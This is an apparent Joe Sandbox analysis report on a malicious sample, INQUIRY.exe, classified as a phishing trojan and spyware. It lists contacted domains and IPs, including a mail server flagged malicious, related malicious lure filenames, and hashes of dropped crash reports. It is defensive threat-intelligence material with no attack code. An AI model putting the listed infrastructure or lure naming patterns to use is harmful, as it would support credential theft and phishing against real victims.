                    http://www.tiro.com | 0% | URL Reputation | safe
                    http://www.tiro.com | 0% | URL Reputation | safe
                    http://www.tiro.com | 0% | URL Reputation | safe
                    http://www.fontbureau.comepko | 0% | Avira URL Cloud | safe
                    http://www.jiyu-kobo.co.jp/s/ | 0% | Avira URL Cloud | safe
                    http://www.fontbureau.comessed | 0% | URL Reputation | safe
                    http://www.fontbureau.comessed | 0% | URL Reputation | safe
                    http://www.fontbureau.comessed | 0% | URL Reputation | safe
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe
                    http://www.carterandcone.com | 0% | URL Reputation | safe
                    http://www.carterandcone.com | 0% | URL Reputation | safe
                    http://www.carterandcone.com | 0% | URL Reputation | safe
                    http://www.carterandcone.com0p | 0% | Avira URL Cloud | safe
                    http://www.jiyu-kobo.co.jp/cheV | 0% | Avira URL Cloud | safe
                    http://www.jiyu-kobo.co.jp/jp/= | 0% | Avira URL Cloud | safe
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe
                    http://www.typography.netD | 0% | URL Reputation | safe
                    http://www.typography.netD | 0% | URL Reputation | safe
                    http://www.typography.netD | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                    http://fontfabrik.com | 0% | URL Reputation | safe
                    http://fontfabrik.com | 0% | URL Reputation | safe
                    http://fontfabrik.com | 0% | URL Reputation | safe
                    http://www.carterandcone.comTCE | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.comits | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.comMic | 0% | Avira URL Cloud | safe
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                    http://www.fontbureau.comgrito | 0% | URL Reputation | safe
                    http://www.fontbureau.comgrito | 0% | URL Reputation | safe
                    http://www.fontbureau.comgrito | 0% | URL Reputation | safe
                    http://www.sandoll.co.kr | 0% | URL Reputation | safe
                    http://www.sandoll.co.kr | 0% | URL Reputation | safe
                    http://www.sandoll.co.kr | 0% | URL Reputation | safe
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                    http://www.carterandcone.comTC( | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.como. | 0% | URL Reputation | safe
                    http://www.carterandcone.como. | 0% | URL Reputation | safe
                    http://www.carterandcone.como. | 0% | URL Reputation | safe
                    http://www.sakkal.com | 0% | URL Reputation | safe
                    http://www.sakkal.com | 0% | URL Reputation | safe
                    http://www.sakkal.com | 0% | URL Reputation | safe
                    http://www.fontbureau.comTTFF | 0% | Avira URL Cloud | safe
                    http://www.fontbureau.com= | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.comtig | 0% | Avira URL Cloud | safe
                    http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
                    http://www.fontbureau.comnc. | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.comTC | 0% | URL Reputation | safe
                    http://www.carterandcone.comTC | 0% | URL Reputation | safe
                    http://www.carterandcone.comTC | 0% | URL Reputation | safe
                    http://go.microsoft. | 0% | Avira URL Cloud | safe
                    http://go.microsoft.LinkId=42127 | 0% | Avira URL Cloud | safe
                    http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
                    http://en.w | 0% | URL Reputation | safe
                    http://en.w | 0% | URL Reputation | safe
                    http://en.w | 0% | URL Reputation | safe
                    http://www.carterandcone.comn | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.coml | 0% | URL Reputation | safe
                    http://www.carterandcone.coml | 0% | URL Reputation | safe
                    http://www.carterandcone.coml | 0% | URL Reputation | safe
                    http://www.carterandcone.comle | 0% | Avira URL Cloud | safe
                    http://www.fontbureau.comk | 0% | Avira URL Cloud | safe
                    http://www.fontbureau.comm= | 0% | Avira URL Cloud | safe
                    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/s | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/s | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/s | 0% | URL Reputation | safe
                    http://www.fontbureau.comlvfet | 0% | Avira URL Cloud | safe
                    http://www.fontbureau.coms | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.com$p | 0% | Avira URL Cloud | safe

                    Domains and IPs

                    Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    whatismyipaddress.com | 104.16.154.36 | true | false | | high
                    mail.iigcest.com | 166.62.27.57 | true | true | | unknown
                    121.205.6.0.in-addr.arpa | unknown | unknown | true | | unknown

                        Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    http://whatismyipaddress.com/ | false | | high

                          URLs from Memory and Binaries


                                                                      Contacted IPs


                                                                      Public

IP            | Domain  | Country       | ASN   | ASN Name                    | Malicious
104.16.154.36 | unknown | United States | 13335 | CLOUDFLARENETUS             | false
104.16.155.36 | unknown | United States | 13335 | CLOUDFLARENETUS             | false
166.62.27.57  | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

                                                                      Private

IP: 192.168.2.1

                                                                      General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 319686
Start date: 18.11.2020
Start time: 15:00:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 29s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: INQUIRY.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@46/34@17/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 82% (good quality ratio 80.2%)
• Quality average: 85.6%
• Quality standard deviation: 23.6%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.255.188.83, 51.104.144.132, 205.185.216.42, 205.185.216.10, 52.155.217.156, 20.54.26.129, 52.147.198.201, 92.122.213.247, 92.122.213.194, 51.104.139.180, 13.64.90.137
                                                                      • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                      Simulations

                                                                      Behavior and APIs

Time | Type | Description
15:01:59 | API Interceptor | 70x Sleep call for process: INQUIRY.exe modified
15:02:07 | API Interceptor | 4x Sleep call for process: dw20.exe modified
15:02:22 | API Interceptor | 2x Sleep call for process: WerFault.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

Match: 104.16.154.36
Associated Sample Name / URL | Detection | Context
c9o0CtTIYT.exe | malicious | whatismyipaddress.com/
6JLHKYvboo.exe | malicious | whatismyipaddress.com/
khJdbt0clZ.exe | malicious | whatismyipaddress.com/
ZMOKwXqVHO.exe | malicious | whatismyipaddress.com/
5Av43Q5IXd.exe | malicious | whatismyipaddress.com/
8oaZfXDstn.exe | malicious | whatismyipaddress.com/
9vdouqRTh3.exe | malicious | whatismyipaddress.com/
M9RhKQ1G91.exe | malicious | whatismyipaddress.com/
0CyK3Y7XBs.exe | malicious | whatismyipaddress.com/
pwYhlZGMa6.exe | malicious | whatismyipaddress.com/
Vll6ZcOkEQ.exe | malicious | whatismyipaddress.com/
oLHQIQAI3N.exe | malicious | whatismyipaddress.com/
YrHUxpftPs.exe | malicious | whatismyipaddress.com/
WuGzF7ZJ7P.exe | malicious | whatismyipaddress.com/
cj9weNQmT2.exe | malicious | whatismyipaddress.com/
lk5M5Q97c3.exe | malicious | whatismyipaddress.com/
2v7Vtqfo81.exe | malicious | whatismyipaddress.com/
Enquiry_pdf.exe | malicious | whatismyipaddress.com/
KM4ukzS8ER.exe | malicious | whatismyipaddress.com/
kYr85V73sJ.exe | malicious | whatismyipaddress.com/

                                                                      Domains

Match: whatismyipaddress.com
Associated Sample Name / URL | Detection | Context
Prueba de pago.exe | malicious | 104.16.155.36
879mgDuqEE.jar | malicious | 66.171.248.178
remittance1111.jar | malicious | 66.171.248.178
879mgDuqEE.jar | malicious | 66.171.248.178
remittance1111.jar | malicious | 66.171.248.178
https://my-alliances.co.uk/ | malicious | 66.171.248.178
c9o0CtTIYT.exe | malicious | 104.16.154.36
mR3CdUkyLL.exe | malicious | 104.16.155.36
6JLHKYvboo.exe | malicious | 104.16.155.36
jSMd8npgmU.exe | malicious | 104.16.155.36
khJdbt0clZ.exe | malicious | 104.16.154.36
ZMOKwXqVHO.exe | malicious | 104.16.154.36
5Av43Q5IXd.exe | malicious | 104.16.154.36
8oaZfXDstn.exe | malicious | 104.16.154.36
RXk6PjNTN8.exe | malicious | 104.16.155.36
9vdouqRTh3.exe | malicious | 104.16.154.36
5pB35gGfZ5.exe | malicious | 104.16.155.36
M9RhKQ1G91.exe | malicious | 104.16.154.36
0CyK3Y7XBs.exe | malicious | 104.16.154.36
pwYhlZGMa6.exe | malicious | 104.16.154.36

Match: mail.iigcest.com
Associated Sample Name / URL | Detection | Context
Vll6ZcOkEQ.exe | malicious | 166.62.27.57
x2rzwu7CQ3.exe | malicious | 166.62.27.57
X62RG9z7kY.exe | malicious | 166.62.27.57
SWIFT100892220-PDF.exe | malicious | 166.62.27.57
SWIFT0079111-pdf.exe | malicious | 166.62.27.57
AD1-2001328L_pdf.exe | malicious | 166.62.27.57

                                                                      ASN

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Context
ShippingDoc.jar | malicious | 104.23.98.190
JmuEmJ4T4r5bc8S.exe | malicious | 172.67.188.154
SecuriteInfo.com.Mal.Generic-S.5505.exe | malicious | 172.67.135.77
Mailbox-Terms&Conditions.jar | malicious | 104.20.23.46
ant.exe | malicious | 104.27.160.64
List Of Orders.exe | malicious | 172.67.188.154
Mailbox-Terms&Conditions.jar | malicious | 104.20.23.46
https://aaqkagzimdeymd.nicepage.io/CEREA-PARTNERS.html?version=25fbab78-b58c-47ae-9818-2632bfb7ce1f&uid=a3c290bf-b6ac-425a-b7f8-c2d16638c672 | malicious | 104.16.19.94
Prueba de pago.exe | malicious | 104.16.155.36
a66a5257bb6ee2e690450c48a91815d4.exe | malicious | 104.23.99.190
D6vy84I7rJ.exe | malicious | 162.159.133.233
u82lb18JnW.exe | malicious | 104.31.92.240
https://agrabadconventionhall.com/redirect-outlook.com/server%20configuration/?#info@herbertarchitekten.de | malicious | 104.16.18.94
https://agrabadconventionhall.com/redirect-outlook.com/server configuration/ | malicious | 104.16.19.94
baf6b9fcec491619b45c1dd7db56ad3d.exe | malicious | 172.67.214.161
http://cricketventures.com | malicious | 104.26.13.251
https://www.chm-endurance.com/ | malicious | 104.22.24.131
https://bitly.com/35yFnns | malicious | 104.16.19.94
https://email.ofificeshareserver1.ml/e/c/eyJlbWFpbF9pZCI6IlJPS0xCZ01BQVhYVjZXVUFLRTFaMUpQWmZrTU1mUT09IiwiaHJlZiI6Imh0dHBzOi8vZmlyZWJhc2VzdG9yYWdlLmdvb2dsZWFwaXMuY29tL3YwL2Ivc2l0ZXMtMDAuYXBwc3BvdC5jb20vby9zaGFyZS1wb2ludCUyRnJlZGlyZWN0Lmh0bWw_YWx0PW1lZGlhXHUwMDI2dG9rZW49ZWM5NWIwZjItNTE4Ny00YzA3LWExNGUtMDA2OWE0ZWI0ODcxXHUwMDI2ZW1haWw9bWFya3VzLm5pZXRoQGp1bGl1c2JhZXIuY29tIiwibGlua19pZCI6MSwicG9zaXRpb24iOjB9/1b8972b4385f4f0bcb49ca81c6f33c388775dae940b9f44c90bdf57423203612 | malicious | 104.31.71.251
https://j.mp/38NwiZZ | malicious | 104.27.187.65

Match: AS-26496-GO-DADDY-COM-LLCUS
Associated Sample Name / URL | Detection | Context
moses.exe | malicious | 148.66.138.196
PROOF OF PAYMENT.exe | malicious | 184.168.131.241
baf6b9fcec491619b45c1dd7db56ad3d.exe | malicious | 184.168.131.241
https://j.mp/38NwiZZ | malicious | 107.180.26.71
POSH XANADU Order-SP-20-V241e.xlsx | malicious | 184.168.131.241
https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304 | malicious | 198.71.233.138
https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304 | malicious | 198.71.233.138
anthony.exe | malicious | 107.180.4.22
https://sailingfloridakeys.com/Guarantee/ | malicious | 104.238.92.18
oX3qPEgl5x.exe | malicious | 198.71.232.3
https://rfpforsubmission.typeform.com/to/Vtnb9OBC | malicious | 148.72.93.116
udtiZ6qM4s.exe | malicious | 198.12.231.132
4WD28ZoLXN.exe | malicious | 166.62.110.232
AgvxMpx2Dv.exe | malicious | 132.148.26.76
Untitled 20201030.doc | malicious | 198.71.233.96
eLaaw7SqMi.exe | malicious | 68.178.213.243
https://www.coalesceresearchgroup.com/coalesceinternational.com/acceount/ | malicious | 148.72.22.210
jrzlwOa0UC.exe | malicious | 107.180.2.103
p8LV1eVFyO.exe | malicious | 184.168.131.241
wHRBHjmaGw.exe | malicious | 132.148.26.76

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INQUIRY.exe_9acf60ae8258c649d949998398a696799dd6ab7_31a5ab7c_0466ea22\Report.wer
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):19244
                                                                      Entropy (8bit):3.7689860404632216
                                                                      Encrypted:false
                                                                      SSDEEP:192:OYcm0I9+HzHqHBUZMXIjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS27P:X4HziBUZMXIjB7vqsSt/u7sSX4It5a8
                                                                      MD5:C8F2F641B01A44390EE72AB0291023BB
                                                                      SHA1:73DD3194D00A241D6506AC88E94A31C0872AAD9E
                                                                      SHA-256:253F7456400E5CD904BCCB71A341A89DDED83968C28A9ECDED505C38833040EE
                                                                      SHA-512:D10C15F5E4E81ACB4489DFD0CD212672A3396CF5CCCC38D76A5225B0E68B72EC05B22D9F2C08377CE5736CEAE4D545DB1C0DCF44A99D889EA64C797035DA4CE5
                                                                      Malicious:true
Preview (UTF-16LE decoded):
Version=1
EventType=APPCRASH
EventTime=132501817687253681
ReportType=2
Consent=1
UploadTime=132501817836315720
ReportStatus=268435456
ReportIdentifier=8747199a-fe79-446d-ac83-230d3d494344
IntegratorReportIdentifier=82592d12-66c3-4711-b547-652b0d3e5cbb
Wow64Host=34404
Wow64Guest=332
NsAppName=INQUIRY.exe
AppSessionGuid=00001a98-0001-001b-6123-c676b3bdd601
TargetAppId=W:000612990e188ecd5a7e871b97a6a4cb7bb80000ffff!000053ae0b576f7b362b90a25ace1470d33068db4490!INQUIRY.exe
TargetAppVer…
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INQUIRY.exe_9acf60ae8258c649d949998398a696799dd6ab7_31a5ab7c_1a2a4622\Report.wer
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):19246
                                                                      Entropy (8bit):3.7687586959631867
                                                                      Encrypted:false
                                                                      SSDEEP:192:cg/3+HVHqHBUZMXIjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS274ItF:B/uHViBUZMXIjB7vqsSt/u7sSX4It5a0
                                                                      MD5:0F2339E59B1382CFEBA7C65E0204DB37
                                                                      SHA1:869CD3F293F945FE0B794C50EF4899CCC318B52C
                                                                      SHA-256:EBD1A41084A86F927C8E65CD72B32DC6B9A5E16C62205A82F52EC9B364A79947
                                                                      SHA-512:1C8564A5E898644CBCF53664A1D39E26ADF5BE1DBA3DB233E2C325BA846520DACDFAC2DF7243F21C9AF1F78A9F2CCB035C1C2BCFB919FD0B1A8CEF54D657D231
                                                                      Malicious:true
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.3.1.8.8.1.7.4.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.4.1.3.3.4.8.3.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.0.d.d.f.0.9.-.6.b.6.0.-.4.1.9.c.-.a.1.3.4.-.4.f.2.8.d.1.1.b.2.7.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.f.0.8.8.e.c.-.c.a.5.c.-.4.4.9.4.-.8.6.f.d.-.f.b.f.f.c.f.f.8.d.b.5.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.Q.U.I.R.Y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.0.8.-.0.0.0.1.-.0.0.1.b.-.8.5.b.b.-.c.f.5.b.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_009f3881\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7579185842846132
                                                                      Encrypted:false
                                                                      SSDEEP:192:EZ+HLTi+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7srS274ItZ:HHLVjB7vqsSt/u7srX4ItZ
                                                                      MD5:FBCEA239031271D5FC498B4CCFF7FFC5
                                                                      SHA1:A317C75282FB18400F1DA04EE684D29A375F5919
                                                                      SHA-256:96D8D97D8A8C4F15EE1E0D1B75A78F8BEEBF3845EDD82E72E8D46F7F92F6B92E
                                                                      SHA-512:6DF096B4314D9F1E9E7672055DA379DE2270F970E3F5F2CE1026322C9CD0F52927DC652D3806CCCCA12662BD9121B0A8BC1528306CB63976184EF87AA99F2261
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.8.0.2.7.7.2.1.3.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.8.0.3.9.2.8.3.7.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.1.4.c.0.8.c.-.3.3.4.9.-.4.a.e.4.-.8.5.a.7.-.e.5.4.9.3.b.5.0.4.7.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.f.0.-.0.0.0.1.-.0.0.1.b.-.1.3.6.7.-.d.8.8.e.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.9.1.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_18bf7163\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18448
                                                                      Entropy (8bit):3.7581897365137853
                                                                      Encrypted:false
                                                                      SSDEEP:192:21+H0Ti+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7srS274Itu:VH0VjB7vqsSt/u7srX4Itu
                                                                      MD5:5856CBF6D7376E0047754E49722CDE9A
                                                                      SHA1:051FCA316BE423B3D5475C843573239C084BB0AE
                                                                      SHA-256:AC6415AD3FD401C7E0B4547121023266CF2ABBC2F75A35FCCB2763DB2B36AEF3
                                                                      SHA-512:560A4FF5B36ED1ABA6F86856AE12A665208CED8A67893FC36246CC049C7B0DD9872AB2DC26E552D40E24A384B3441555442CE3505138F61EC24DDFE832C1A25F
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.8.1.5.4.4.3.9.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.8.1.8.5.0.6.4.5.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.3.8.0.2.4.7.-.2.d.d.b.-.4.4.5.7.-.9.b.1.5.-.f.1.3.e.e.5.6.2.1.6.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.b.-.f.b.5.c.-.2.0.9.8.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.9.6.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_1a860a22\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7573567572608084
                                                                      Encrypted:false
                                                                      SSDEEP:192:2Mlg+HPTi+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7stS274Itw:bNHPVjB7vqsSt/u7stX4Itw
                                                                      MD5:BEA478764A49288FAE5D2C58DEA9E7F7
                                                                      SHA1:8601AF0DC1CFDBA1A6FD96882B78E44800F059AF
                                                                      SHA-256:D55EC04B23C4335716973DD1BE81A228576593188597B2FF2422E7CA596DAC57
                                                                      SHA-512:15AA099538B4D44703D965C393892452B5D204568CFE062308F35741F8C10FC87738AFF0CE2AEE3B2D9C3E2770C774C4216A053554CF554073FD0335AC46035B
                                                                      Malicious:false
